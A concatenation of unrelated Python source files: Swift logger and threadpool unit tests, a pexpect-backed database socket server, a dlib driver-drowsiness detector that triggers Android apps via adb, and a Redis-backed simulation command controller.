def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assert_(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertEqual(None, logger.update_stats('foo', 88))
self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
self.assertEqual(None, logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertEqual(None, logger.increment('foo'))
self.assertEqual(None, logger.increment('foo', 0.57))
self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
self.assertEqual(None, logger.decrement('foo'))
self.assertEqual(None, logger.decrement('foo', 0.57))
self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
self.assertEqual(None, logger.timing('foo', 88.048))
self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
self.assertEqual(None, logger.timing_since('foo', 8938))
self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
self.assertEqual(None, logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEquals(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEquals('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
def test_thread_locals(self):
logger = utils.get_logger(None)
orig_thread_locals = logger.thread_locals
try:
self.assertEquals(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEquals(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEquals(logger.thread_locals, ('5678', '5.6.7.8'))
finally:
logger.thread_locals = orig_thread_locals
def test_no_fdatasync(self):
called = []
class NoFdatasync:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync:
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEquals(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEquals(called, [12345])
class TestThreadpool(unittest.TestCase):
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_run_in_thread_without_threads(self):
# with zero threads, run_in_thread doesn't actually do so
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEquals(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEquals(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEquals(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.force_run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
class TestAuditLocationGenerator(unittest.TestCase):
def test_non_dir_contents(self):
with temptree([]) as tmpdir:
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
with open(os.path.join(data, "partition1"), "w"):
pass
partition = os.path.join(data, "partition2")
os.makedirs(partition)
with open(os.path.join(partition, "suffix1"), "w"):
pass
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
with open(os.path.join(suffix, "hash1"), "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False
)
self.assertEqual(list(locations), [])
def test_find_objects(self):
with temptree([]) as tmpdir:
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
def test_ignore_metadata(self):
with temptree([]) as tmpdir:
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
meta_path = os.path.join(hash_path, "obj1.meta")
with open(meta_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
def test_runs_everything(self):
def run_test():
tests_ran[0] += 1
return tests_ran[0]
tests_ran = [0]
pile = utils.GreenAsyncPile(3)
for x in xrange(3):
pile.spawn(run_test)
self.assertEqual(sorted(x for x in pile), [1, 2, 3])
def test_is_asynchronous(self):
def run_test(index):
events[index].wait()
return index
pile = utils.GreenAsyncPile(3)
for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
events = [eventlet.event.Event(), eventlet.event.Event(),
eventlet.event.Event()]
for x in xrange(3):
pile.spawn(run_test, x)
for x in order:
events[x].send()
self.assertEqual(next(pile), x)
def test_next_when_empty(self):
def run_test():
pass
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test)
self.assertEqual(next(pile), None)
self.assertRaises(StopIteration, lambda: next(pile))
def test_waitall_timeout_timesout(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 1.0)
self.assertEqual(pile.waitall(0.2), [0.1])
self.assertEqual(completed[0], 1)
def test_waitall_timeout_completes(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 0.1)
self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
self.assertEqual(completed[0], 2)
if __name__ == '__main__':
unittest.main()
|
loader.py | # from threading import Thread
from back.mongo.backups.js import load_js
from back.mongo.backups.json import load_json
from back.mongo.backups.sass import load_sass
def load_data(path):
load_js(path)
load_json(path)
load_sass(path)
# Thread(target=load_json, args=(path,)).start()
|
server.py | from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
# from subprocess import Popen, PIPE, STDOUT
import pexpect
from message_handler import MessageHandler
from rsa_ops import init_rsa
class Server:
def __init__(self, ip, port, n_con, bsize=1024):
self.ip = ip
self.port = port
self.n_con = n_con
self.bsize = bsize
self.pubkey, self.privkey = init_rsa()
# print("pub:", self.pubkey)
def show_attrs(self):
print(self.ip, self.port, self.n_con)
def handle_client(self, mh, child):
while True:
data = mh.receive_message().strip()
if not data:
print(">> Client disconnected")
break
print("Client says:", data)
# qh = QueryHandler(data)
# result = qh.run()
# print("<> Data sent to query_handler and query ran")
# res = p.communicate(input=data.encode("utf-8"))[0]
# child.expect(b"db >*")
child.sendline(data)
if data == '.exit':
mh.send_message("\n\n\n")
print(">> Client closed the database connection")
break
child.expect(b"db >*")
res = child.before
print("Result obtained:", res)
if res == b'':
res = b'\n'
mh.send_message(res.decode("utf-8"))
mh.close()
def run(self):
sock = socket(AF_INET, SOCK_STREAM)
sock.bind((self.ip, self.port))
sock.listen(self.n_con)
print("Starting db server..")
# p = Popen(
# # ["./db_bin", "db.pocketdb"], stdin=PIPE, stdout=PIPE,
# # stderr=STDOUT
# )
while True:
child = pexpect.spawn("./db_bin db.pocketdb")
child.expect(b"db >*")
print("Db server started")
cl, addr = sock.accept()
print(">> Connected to a new client")
mh = MessageHandler(cl, self.bsize, self.pubkey, self.privkey)
Thread(target=self.handle_client, args=(mh, child)).start()
if __name__ == '__main__':
server = Server('127.0.0.1', 9001, 3)
server.run()
|
capture.py | # import the necessary packages
from scipy.spatial import distance as dist
from imutils.video import VideoStream
from imutils import face_utils
from threading import Thread
import numpy as np
import playsound
import argparse
import imutils
import time
import dlib
import cv2
import subprocess
status = "false"
def sound_alarm(alarm):
global status
# play an alarm sound
#playsound.playsound(path)
if alarm == "true":
if status == "false":
subprocess.call("adb shell am start -n com.example.alertapp/.MainActivity",shell=True)
status = "true"
else:
if status == "true":
subprocess.call("adb shell am start -n com.microntek.navisettings/.MainActivity",shell=True)
status = "false"
def eye_aspect_ratio(eye):
# compute the euclidean distances between the two sets of
# vertical eye landmarks (x, y)-coordinates
A = dist.euclidean(eye[1], eye[5])
B = dist.euclidean(eye[2], eye[4])
# compute the euclidean distance between the horizontal
# eye landmark (x, y)-coordinates
C = dist.euclidean(eye[0], eye[3])
# compute the eye aspect ratio
ear = (A + B) / (2.0 * C)
# return the eye aspect ratio
return ear
def capturePicture(frame):
cv2.imwrite(filename='face.jpeg', img=frame)
# define two constants, one for the eye aspect ratio to indicate
# blink and then a second constant for the number of consecutive
# frames the eye must be below the threshold for to set off the
# alarm
EYE_AR_THRESH = 0.3
EYE_AR_CONSEC_FRAMES = 50
# initialize the frame counter as well as a boolean used to
# indicate if the alarm is going off
COUNTER = 0
ALARM_ON = False
# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
# grab the indexes of the facial landmarks for the left and
# right eye, respectively
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
# start the video stream thread
vs = VideoStream(src=0).start()
time.sleep(1.0)
EyeCounter = 0
#start timer
oldtime= time.time()
# loop over frames from the video stream
while True:
# grab the frame from the threaded video file stream, resize
frame = vs.read()
frame = imutils.resize(frame, width=450)
#capture image for emotion
if time.time() - oldtime > 59:
capturePicture(frame)
oldtime = time.time()
#convert it to grayscale channels
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# detect faces in the grayscale frame
rects = detector(gray, 0)
#check if faces were not detected in frame
if not rects:
EyeCounter += 1
if (EyeCounter == 70):
if not ALARM_ON:
ALARM_ON = True
t = Thread(target=sound_alarm, args=("true",))
#start a thread to have the alarm sound played in the background
t.deamon = True
t.start()
cv2.putText(frame, "Stay Alert!", (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
EyeCounter = 0
ALARM_ON = False
sound_alarm("false")
# loop over the face detections
for rect in rects:
# determine the facial landmarks for the face region, then
# convert the facial landmark (x, y)-coordinates to a NumPy
# array
shape = predictor(gray, rect)
shape = face_utils.shape_to_np(shape)
# extract the left and right eye coordinates, then use the
# coordinates to compute the eye aspect ratio for both eyes
leftEye = shape[lStart:lEnd]
rightEye = shape[rStart:rEnd]
leftEAR = eye_aspect_ratio(leftEye)
rightEAR = eye_aspect_ratio(rightEye)
# average the eye aspect ratio together for both eyes
ear = (leftEAR + rightEAR) / 2.0
# compute the convex hull for the left and right eye, then
# visualize each of the eyes
leftEyeHull = cv2.convexHull(leftEye)
rightEyeHull = cv2.convexHull(rightEye)
cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
# check to see if the eye aspect ratio is below the blink
# threshold, and if so, increment the blink frame counter
if ear < EYE_AR_THRESH:
COUNTER += 1
# if the eyes were closed for a sufficient number of
# then sound the alarm
if COUNTER >= EYE_AR_CONSEC_FRAMES:
if not ALARM_ON:
ALARM_ON = True
t = Thread(target=sound_alarm, args=("true",))
t.deamon = True
t.start()
# draw an alarm on the frame
cv2.putText(frame, "Stay Alert!", (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
ALARM_ON = False
sound_alarm("false")
# otherwise, the eye aspect ratio is not below the blink
# threshold, so reset the counter and alarm
else:
COUNTER = 0
ALARM_ON = False
sound_alarm("false")
# show the frame
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
|
commands_controller.py | import connexion
import six
import logging
import time
#from flask import json
import pickle
import json
import os
import threading
import data_management.redisDB
from swagger_server.models.simulation import Simulation # noqa: E501
from swagger_server import util
from data_management.controller import gridController as gControl
from swagger_server.models.simulation_result import SimulationResult
from swagger_server.models.voltage import Voltage
from swagger_server.models.error import Error
from data_management.redisDB import RedisDB
from data_management.utils import Utils
from data_management.ModelException import InvalidModelException, MissingKeysException
from swagger_server.controllers.threadFactory import ThreadFactory
from more_itertools import unique_everseen
logging.basicConfig(
format='%(asctime)s %(levelname)s %(name)s: %(message)s', level=logging.DEBUG)
logger = logging.getLogger(__file__)
class CommandController:
_instance = None
_lock = threading.Lock()
def __new__(cls):
if CommandController._instance is None:
with CommandController._lock:
if CommandController._instance is None:
CommandController._instance = super(
CommandController, cls).__new__(cls)
return CommandController._instance
def __init__(self):
self.factory = {}
self.redisDB = RedisDB()
self.statusThread = {}
self.running = {}
self.utils = Utils()
def set_isRunning(self, id, bool):
self.running[id] = bool
def set(self, id, object):
logger.debug("Object in set: "+str(object))
try:
self.factory[id] = object
# fname="factory_"+str(id)
#path = os.path.join("data", fname)
#self.utils.store_data(path, object)
except Exception as e:
logger.debug(e)
def get(self, id):
return self.factory[id]
#fname= "factory_"+str(id)
#path = os.path.join("data", fname)
# return self.utils.get_stored_data(path)
def isRunningExists(self):
logger.debug("IsRunning exists: " + str(len(self.running)))
if len(self.running):
return True
else:
return False
def get_isRunning(self, id):
if id in self.running.keys():
return self.running[id]
else:
return False
def get_running(self):
return self.running
def get_statusThread(self, id):
return self.statusThread[id]
def run(self, id, json_object):
logger.debug("Run in command controller started")
self.id = id
self.duration = json_object["sim_duration_in_hours"]
logger.debug("Duration: "+str(self.duration))
self.redisDB.set("timestep_" + str(id), str(0))
self.redisDB.set("sim_days_" + str(id), str(self.duration))
#gridController = gControl()
#self.factory= jsonpickle.decode(self.redisDB.get("factory: "+id))
#self.redisDB.get("factory: " + id)
#logger.debug("This is the factory for command controller: "+str(self.factory))
#self.set(self.id, self.redisDB.get("factory: " + id))
# gridController.setParameters(id,)
#logger.debug("Thread set")
#
try:
self.set(self.id, ThreadFactory(self.id, self.duration))
logger.debug("Factory instance stored")
# redis_db.set("factory: "+id, json.dumps(factory))
# logger.debug("Factory: "+str(factory[id]))
# object=redis_db.get("factory: "+id)
# logger.debug("Factory stored in redisDB: "+str(object))
# test= json.loads(object[id])
# logger.debug("Factory stored in redisDB: " + str(test)+" type: "+str(type(test)))
#self.redisDB.set("run:" + self.id, "running")
self.redisDB.set("run:" + id, "starting")
logger.debug("Status: "+str(self.redisDB.get("run:" + self.id)))
logger.debug("Thread: " + str(self.get(self.id)))
msg = self.get(self.id).startController()
logger.debug("Answer from Thread factory: " + str(msg))
if msg == 0:
self.set_isRunning(id, True)
logger.debug("Flag isRunning set to True")
self.statusThread[id] = threading.Thread(
target=self.run_status, args=(id,))
logger.debug("Status of the Thread started")
self.statusThread[id].start()
meta_data = {"id": id,
"ztarttime": time.time()}
self.redisDB.set("run:" + id, "running")
self.redisDB.set("id_meta:" + id, json.dumps(meta_data))
logger.info("running status " + str(self.running))
logger.debug("Command controller start finished")
return 0
else:
self.set_isRunning(id, False)
logger.debug("Flag isRunning set to False")
self.redisDB.set("run:" + id, "stopped")
logger.error("Command controller start could not be finished")
return 1
#self.redisDB.set("run:" + self.id, "stop")
# return buildAnswer(listNames, listValues, json_object.threshold_high, json_object.threshold_medium,
# json_object.threshold_low)
except Exception as e:
logger.error(e)
return e
#self.set_isRunning(self.id, True)
#logger.debug("Flag isRunning set to True")
#logger.info("running status " + str(self.running))
#logger.info("running status " + str(self.redisDB.get("run:" + self.id)))
#logger.debug("from redis: "+str(self.factory)+" type: "+str(type(self.factory)))
# self.factory=ThreadFactory()
#logger.debug("Normal: " + str(self.factory) + " type: " + str(type(self.factory)))
#listNames, listValues = self.factory.startController()
# return "started"
# return (listNames, listValues)
# return buildAnswer(listNames, listValues, json_object.threshold_high, json_object.threshold_medium, json_object.threshold_low)
def abort(self, id):
logger.debug("Abort signal received")
logger.debug("This is the factory object: " + str(self.get(id)))
if self.factory[id]:
self.factory[id].stopControllerThread()
self.set_isRunning(id, False)
message = "System stopped succesfully"
self.redisDB.set("run:" + id, "stopped")
logger.debug(message)
else:
message = "No threads found"
logger.debug(message)
def run_status(self, id):
while True:
status = self.get(id).is_running()
flag = self.redisDB.get("run:" + id)
logger.debug("Control run_status: "+str(flag))
#logger.debug("status " + str(status))
if status == "True" or (flag is not None and flag == "stop"):
logger.debug("Control run_status: "+str(flag))
self.redisDB.set("run:" + id, "stopping")
self.abort(id)
break
time.sleep(2)
variable = CommandController()
def abort_simulation(id): # noqa: E501
"""Aborts a running simulation
If the user of the professional GUI decides to abort a running simulation this call will be triggered # noqa: E501
:rtype: None
"""
try:
redis_db = RedisDB()
flag = redis_db.get("run:" + id)
message = ""
if flag is not None and flag == "running":
logger.debug("System running and trying to stop")
redis_db.set("run:" + id, "stop")
time.sleep(1)
flag = redis_db.get("run:" + id)
logger.debug("Flag in stop: " + str(flag))
if flag is None:
logger.debug("System stopped succesfully")
message = "System stopped succesfully"
elif "stopping" in flag:
message = "System stopped succesfully"
counter = 0
while ("stopping" in flag):
flag = redis_db.get("run:" + id)
counter = counter + 1
if counter >= 15:
message = "system stopped succesfully"
break
else:
time.sleep(1)
logger.debug("System stopped succesfully")
elif "stopped" in flag:
logger.debug("System stopped succesfully")
message = "System stopped succesfully"
else:
message = "Problems while stopping the system"
elif flag is not None and flag == "stopped":
logger.debug("System already stopped")
message = "System already stopped"
elif flag is None:
logger.debug("System already stopped")
message = "System already stopped"
except Exception as e:
logger.error(e)
message = "Error stoping the system"
return message
def get_simulation_status(id): # noqa: E501
"""Get the status of the simulation
# noqa: E501
:param id: ID of the simulation
:type id: str
:rtype: float
"""
try:
dir = os.path.join("data", str(id))
if not os.path.exists(dir):
return "Id not existing"
redis_db = RedisDB()
flag = redis_db.get("run:" + id)
logger.info("flag: " + str(flag))
if flag == None or flag == "created":
return "Simulation has not been started"
logger.debug("#############Getting status#####################")
status_message = redis_db.get("status_"+ str(id))
if status_message == "OK":
timestep = int(redis_db.get("timestep_"+str(id)))
logger.debug("timestep "+str(timestep))
sim_days = int(redis_db.get("sim_days_"+str(id)))
logger.debug("sim_days "+str(sim_days))
status = (timestep / (sim_days-1)) * 100.0
if timestep == (sim_days - 1):
flag_stop = redis_db.get("opt_stop_" + id)
logger.debug("flag stop "+str(flag_stop))
if flag_stop == "False":
status = status - 1
return int(status)
else:
return status_message, 406
except Exception as e:
logger.error(e)
status = "id not present"
def run_simulation(id, body=None): # noqa: E501
"""Runs a simulation
Runs a simulation # noqa: E501
:param id: ID of the simulation that should be started
:type id: str
:param body: Configuration data for the simulation e.g. duration
:type body: dict | bytes
:rtype: List[SimulationResult]
"""
logger.info("Running Simulation ...")
if connexion.request.is_json:
logger.info("Start command for simulation ID: " + id)
data = connexion.request.get_json()
logger.debug("data "+str(data)+" type "+str(type(data)))
dir = os.path.join("data", str(id))
if not os.path.exists(dir):
return "Id not existing"
redisDB = RedisDB()
# flag = redis_db.get(id)
flag = redisDB.get("run:" + id)
logger.info("flag: " + str(flag))
if flag is not None and flag == "running":
return "System already running"
else:
try:
# start random values for the status to become zero
msg = variable.run(id, data)
if msg == 0:
msg_to_send = "System started succesfully"
else:
msg_to_send = "System could not start"
return msg_to_send
except (InvalidModelException, MissingKeysException) as e:
logger.error("Error " + str(e))
redisDB.set("run:" + id, "stopped")
return str(e)
else:
logger.error("Wrong Content-Type")
return "Wrong Content-Type"
"""if flag is not None and flag == "created":
if variable.isRunningExists():
logger.debug("isRunning exists")
if not variable.get_isRunning(id):
response = variable.run(id, data)
return response
else:
logger.debug("System already running")
return "System already running"
else:
logger.debug("isRunning not created yet")
response = variable.run(id, data)
return response
else:
response = "Id not existing"
except Exception as e:
logger.error(e)
response = e
return response"""
def buildAnswer(listNames=None, listValues=None, thres_High=0.1, thres_Medium=0.05, thres_Low=0.025):
body = []
values = []
names = []
values_error = []
for name in listNames:
names.append(name.split('.', 1)[0])
names = list(unique_everseen(names))
group_value = [None] * 3
for j in range(len(names)):
for i in range(len(listValues)):
if names[j] in listNames[i]:
if ".1" in listNames[i]:
group_value[0] = listValues[i]
elif ".2" in listNames[i]:
group_value[1] = listValues[i]
elif ".3" in listNames[i]:
group_value[2] = listValues[i]
errors = checkError(group_value, thres_High, thres_Medium, thres_Low)
values_error.append(errors)
voltages = Voltage(group_value[0], group_value[1], group_value[2])
values.append(voltages)
#del group_value[:]
group_value = [None] * 3
for i in range(len(names)):
body.append(SimulationResult(names[i], values[i], values_error[i]))
return body
def checkError(value, thresHigh, thresMedium, thresLow):
group_value_error_high = [None] * 3
group_value_error_medium = [None] * 3
group_value_error_low = [None] * 3
counter = 0
for val in value:
logger.info("Counter: " + str(counter))
if val != None:
logger.info("Val: " + str(val))
if float(val) < (1 - thresHigh) or float(val) > (1 + thresHigh):
group_value_error_high[counter] = val
elif (float(val) < (1 - thresMedium) or float(val) > (1 + thresMedium)):
group_value_error_medium[counter] = val
elif (float(val) < (1 - thresLow) or float(val) > (1 + thresLow)):
group_value_error_low[counter] = val
counter = counter + 1
else:
counter = counter + 1
error = Error(group_value_error_high,
group_value_error_medium, group_value_error_low)
return error
|
site_launcher.py | # Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
